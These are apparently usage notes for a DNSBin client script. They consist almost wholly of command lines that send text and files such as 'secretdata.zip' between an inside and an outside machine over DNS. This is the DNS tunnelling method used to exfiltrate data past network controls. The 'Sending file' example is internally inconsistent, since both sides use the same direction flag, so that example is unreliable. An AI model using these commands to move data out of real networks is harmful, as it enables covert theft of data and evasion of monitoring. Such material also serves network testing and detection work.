Example sending data
Download DNSBin client at
dnsbinclient.py
Sending text
+ Outside machine:
echo test12345 | python dnsbinclient.py -f- -d out -t-
+ Inside machine:
python dnsbinclient.py -f- -d in -t TOKEN_THE_FIRST_COMMAND_GAVE_YOU
Sending file
+ Outside machine:
python dnsbinclient.py -f secretdata.zip -d in -t-
+ Inside machine:
python dnsbinclient.py -f secretdata.zip -d in -t TOKEN_THE_FIRST_COMMAND_GAVE_YOU
Example receiving data
Receiving text
+ Outside machine:
python dnsbinclient.py -f- -d in -t-
+ Inside machine:
echo test12345 | python dnsbinclient.py -f- -d out -t TOKEN_THE_FIRST_COMMAND_GAVE_YOU
Receiving file
+ Outside machine:
python dnsbinclient.py -f secretdata.zip -d in -t-
+ Inside machine:
python dnsbinclient.py -f secretdata.zip -d out -t TOKEN_THE_FIRST_COMMAND_GAVE_YOU